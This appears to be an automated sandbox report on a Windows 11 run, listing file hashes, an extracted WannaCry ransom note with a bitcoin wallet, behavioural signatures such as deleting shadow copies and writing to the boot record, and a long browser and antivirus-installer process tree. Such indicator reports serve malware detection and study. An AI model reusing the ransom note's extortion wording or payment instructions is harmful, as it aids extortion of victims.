Analysis

  • max time kernel
    428s
  • max time network
    429s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240221-en
  • resource tags

    arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    08-04-2024 11:32

Errors

Reason
Machine shutdown

General

  • Target

    1998-toyota-supra-mk4-rear-end-4qe55coxcmxn1xug (1).jpg

  • Size

    414KB

  • MD5

    680e11e6e196d181b52259c16610e481

  • SHA1

    91b811c720a55f1fbdd8cb56d5aace4c928c3395

  • SHA256

    4b74c1e9f4821f39fd431cbd5e2f0e274114f74bfb32c8c1116176f6dc5ce56f

  • SHA512

    a4c9a5cc1f064b3c9b175b33c2447e3f83c55b9e75aa451c8878f40efd5b918c527c3a3739d233c2fa8cc82e38f0f8a6a2d95bcc7db93d22c42ee6b7fd3293d6

  • SSDEEP

    6144:TBpGj5dP+t03i/4mMFBre7xFJRf2dTUd2l28cz9DCkgcM+P8kYbMNmiuOR:T6j5NXXFexF7f6J+z9upcMzowo

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]

Family

wannacry

Ransom Note
Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �
Wallets

115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn

Signatures

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Wannacry

    WannaCry is a ransomware cryptoworm.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 33 IoCs
  • Sets service image path in registry 2 TTPs 15 IoCs
  • Uses Session Manager for persistence 2 TTPs 6 IoCs

    Creates Session Manager registry key to run executable early in system boot.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 64 IoCs
  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Registers COM server for autorun 1 TTPs 13 IoCs
  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks for any installed AV software in registry 1 TTPs 22 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 9 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 5 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 8 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 64 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry class 64 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • NTFS ADS 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 29 IoCs
  • Suspicious behavior: LoadsDriver 30 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 26 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 53 IoCs
  • Suspicious use of SendNotifyMessage 16 IoCs
  • Suspicious use of SetWindowsHookEx 42 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\1998-toyota-supra-mk4-rear-end-4qe55coxcmxn1xug (1).jpg"
    1⤵
      PID:4900
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
      1⤵
      • Enumerates system info in registry
      • Modifies registry class
      • NTFS ADS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:1468
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffce07a3cb8,0x7ffce07a3cc8,0x7ffce07a3cd8
        2⤵
          PID:1352
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1912,18371561712919505401,17007886750878816519,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1932 /prefetch:2
          2⤵
            PID:1908
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1912,18371561712919505401,17007886750878816519,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 /prefetch:3
            2⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:4616
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1912,18371561712919505401,17007886750878816519,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2576 /prefetch:8
            2⤵
              PID:4608
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,18371561712919505401,17007886750878816519,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3208 /prefetch:1
              2⤵
                PID:2428
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,18371561712919505401,17007886750878816519,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:1
                2⤵
                  PID:1520
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,18371561712919505401,17007886750878816519,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4912 /prefetch:1
                  2⤵
                    PID:3532
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,18371561712919505401,17007886750878816519,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4940 /prefetch:1
                    2⤵
                      PID:4108
                    • C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1912,18371561712919505401,17007886750878816519,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3312 /prefetch:8
                      2⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:4972
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1912,18371561712919505401,17007886750878816519,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4008 /prefetch:8
                      2⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:3660
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,18371561712919505401,17007886750878816519,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5384 /prefetch:1
                      2⤵
                        PID:4588
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,18371561712919505401,17007886750878816519,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5396 /prefetch:1
                        2⤵
                          PID:4716
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,18371561712919505401,17007886750878816519,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5628 /prefetch:1
                          2⤵
                            PID:1444
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,18371561712919505401,17007886750878816519,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5452 /prefetch:1
                            2⤵
                              PID:2388
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,18371561712919505401,17007886750878816519,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5936 /prefetch:1
                              2⤵
                                PID:4592
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1912,18371561712919505401,17007886750878816519,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3720 /prefetch:8
                                2⤵
                                  PID:3108
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1912,18371561712919505401,17007886750878816519,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5332 /prefetch:8
                                  2⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:3476
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,18371561712919505401,17007886750878816519,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5340 /prefetch:1
                                  2⤵
                                    PID:780
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,18371561712919505401,17007886750878816519,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3952 /prefetch:1
                                    2⤵
                                      PID:2996
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,18371561712919505401,17007886750878816519,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4504 /prefetch:1
                                      2⤵
                                        PID:3796
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,18371561712919505401,17007886750878816519,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3044 /prefetch:1
                                        2⤵
                                          PID:2488
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1912,18371561712919505401,17007886750878816519,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6324 /prefetch:8
                                          2⤵
                                          • NTFS ADS
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:2388
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1912,18371561712919505401,17007886750878816519,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=4000 /prefetch:2
                                          2⤵
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:2296
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,18371561712919505401,17007886750878816519,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5640 /prefetch:1
                                          2⤵
                                            PID:620
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,18371561712919505401,17007886750878816519,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1240 /prefetch:1
                                            2⤵
                                              PID:2484
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,18371561712919505401,17007886750878816519,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3764 /prefetch:1
                                              2⤵
                                                PID:4500
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,18371561712919505401,17007886750878816519,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5168 /prefetch:1
                                                2⤵
                                                  PID:1388
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,18371561712919505401,17007886750878816519,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4832 /prefetch:1
                                                  2⤵
                                                    PID:4008
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,18371561712919505401,17007886750878816519,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6864 /prefetch:1
                                                    2⤵
                                                      PID:3068
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,18371561712919505401,17007886750878816519,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4908 /prefetch:1
                                                      2⤵
                                                        PID:3420
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,18371561712919505401,17007886750878816519,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6984 /prefetch:1
                                                        2⤵
                                                          PID:4332
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,18371561712919505401,17007886750878816519,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7088 /prefetch:1
                                                          2⤵
                                                            PID:3080
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,18371561712919505401,17007886750878816519,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1
                                                            2⤵
                                                              PID:712
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,18371561712919505401,17007886750878816519,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5260 /prefetch:1
                                                              2⤵
                                                                PID:2124
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,18371561712919505401,17007886750878816519,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4944 /prefetch:1
                                                                2⤵
                                                                  PID:4352
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,18371561712919505401,17007886750878816519,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7032 /prefetch:1
                                                                  2⤵
                                                                    PID:2224
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1912,18371561712919505401,17007886750878816519,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7164 /prefetch:8
                                                                    2⤵
                                                                      PID:1496
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1912,18371561712919505401,17007886750878816519,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7388 /prefetch:8
                                                                      2⤵
                                                                      • NTFS ADS
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      PID:920
                                                                    • C:\Users\Admin\Downloads\avg_antivirus_free_setup.exe
                                                                      "C:\Users\Admin\Downloads\avg_antivirus_free_setup.exe"
                                                                      2⤵
                                                                      • Executes dropped EXE
                                                                      • Loads dropped DLL
                                                                      • Writes to the Master Boot Record (MBR)
                                                                      • Suspicious use of SetWindowsHookEx
                                                                      PID:4896
                                                                      • C:\Windows\Temp\asw.d897af7033d96f4f\avg_antivirus_free_online_setup.exe
                                                                        "C:\Windows\Temp\asw.d897af7033d96f4f\avg_antivirus_free_online_setup.exe" /cookie:mmm_bav_003_999_b8d_m:dlid_FREEGSR-FAD-GLOWEB-8542-1 /ga_clientid:4b1c47d1-182d-4533-872e-ebabf336095c /edat_dir:C:\Windows\Temp\asw.d897af7033d96f4f
                                                                        3⤵
                                                                        • Executes dropped EXE
                                                                        • Loads dropped DLL
                                                                        • Writes to the Master Boot Record (MBR)
                                                                        • Modifies registry class
                                                                        • Suspicious use of FindShellTrayWindow
                                                                        • Suspicious use of SetWindowsHookEx
                                                                        PID:4872
                                                                        • C:\Windows\Temp\asw-9f164a38-f15d-492c-9b2c-cd835b7d6279\common\icarus.exe
                                                                          C:\Windows\Temp\asw-9f164a38-f15d-492c-9b2c-cd835b7d6279\common\icarus.exe /icarus-info-path:C:\Windows\Temp\asw-9f164a38-f15d-492c-9b2c-cd835b7d6279\icarus-info.xml /install /cookie:mmm_bav_003_999_b8d_m:dlid_FREEGSR-FAD-GLOWEB-8542-1 /edat_dir:C:\Windows\Temp\asw.d897af7033d96f4f /track-guid:4b1c47d1-182d-4533-872e-ebabf336095c /sssid:4872
                                                                          4⤵
                                                                          • Executes dropped EXE
                                                                          • Writes to the Master Boot Record (MBR)
                                                                          • Checks processor information in registry
                                                                          • Modifies registry class
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          • Suspicious use of SetWindowsHookEx
                                                                          PID:2616
                                                                          • C:\Windows\Temp\asw-9f164a38-f15d-492c-9b2c-cd835b7d6279\common\icarus_ui.exe
                                                                            C:\Windows\Temp\asw-9f164a38-f15d-492c-9b2c-cd835b7d6279\common\icarus_ui.exe /cookie:mmm_bav_003_999_b8d_m:dlid_FREEGSR-FAD-GLOWEB-8542-1 /edat_dir:C:\Windows\Temp\asw.d897af7033d96f4f /track-guid:4b1c47d1-182d-4533-872e-ebabf336095c /sssid:4872 /er_master:master_ep_d8557de3-7510-44de-baf1-7294352dcb4e /er_ui:ui_ep_842fece5-c674-4974-af38-b1842b2e8125
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            • Suspicious use of FindShellTrayWindow
                                                                            • Suspicious use of SetWindowsHookEx
                                                                            PID:4008
                                                                          • C:\Windows\Temp\asw-9f164a38-f15d-492c-9b2c-cd835b7d6279\avg-av\icarus.exe
                                                                            C:\Windows\Temp\asw-9f164a38-f15d-492c-9b2c-cd835b7d6279\avg-av\icarus.exe /cookie:mmm_bav_003_999_b8d_m:dlid_FREEGSR-FAD-GLOWEB-8542-1 /edat_dir:C:\Windows\Temp\asw.d897af7033d96f4f /track-guid:4b1c47d1-182d-4533-872e-ebabf336095c /sssid:4872 /er_master:master_ep_d8557de3-7510-44de-baf1-7294352dcb4e /er_ui:ui_ep_842fece5-c674-4974-af38-b1842b2e8125 /er_slave:avg-av_slave_ep_ba144503-1582-44ab-9dd9-c70843cfb5de /slave:avg-av
                                                                            5⤵
                                                                            • Drops file in Drivers directory
                                                                            • Sets service image path in registry
                                                                            • Uses Session Manager for persistence
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Registers COM server for autorun
                                                                            • Windows security modification
                                                                            • Adds Run key to start application
                                                                            • Checks for any installed AV software in registry
                                                                            • Writes to the Master Boot Record (MBR)
                                                                            • Drops file in System32 directory
                                                                            • Drops file in Program Files directory
                                                                            • Drops file in Windows directory
                                                                            • Checks SCSI registry key(s)
                                                                            • Checks processor information in registry
                                                                            • Modifies registry class
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            • Suspicious use of SetWindowsHookEx
                                                                            PID:2684
                                                                            • C:\Windows\Temp\asw-9f164a38-f15d-492c-9b2c-cd835b7d6279\avg-av\aswOfferTool.exe
                                                                              "C:\Windows\Temp\asw-9f164a38-f15d-492c-9b2c-cd835b7d6279\avg-av\aswOfferTool.exe" -checkChromeReactivation -elevated -bc=AWFC
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:5144
                                                                              • C:\Users\Public\Documents\aswOfferTool.exe
                                                                                "C:\Users\Public\Documents\aswOfferTool.exe" -checkChromeReactivation -bc=AWFC
                                                                                7⤵
                                                                                • Executes dropped EXE
                                                                                • Loads dropped DLL
                                                                                PID:5212
                                                                            • C:\Windows\Temp\asw-9f164a38-f15d-492c-9b2c-cd835b7d6279\avg-av\aswOfferTool.exe
                                                                              "C:\Windows\Temp\asw-9f164a38-f15d-492c-9b2c-cd835b7d6279\avg-av\aswOfferTool.exe" -checkChrome -elevated
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:5244
                                                                            • C:\Program Files\AVG\Antivirus\SetupInf.exe
                                                                              "C:\Program Files\AVG\Antivirus\SetupInf.exe" /uninstall /netservice:sw_avgNdis
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              • Checks for any installed AV software in registry
                                                                              • Checks processor information in registry
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:6544
                                                                            • C:\Program Files\AVG\Antivirus\SetupInf.exe
                                                                              "C:\Program Files\AVG\Antivirus\SetupInf.exe" /uninstall /netservice:avgNdisFlt /catalog:avgNdisFlt.cat
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              • Checks for any installed AV software in registry
                                                                              • Checks processor information in registry
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:5620
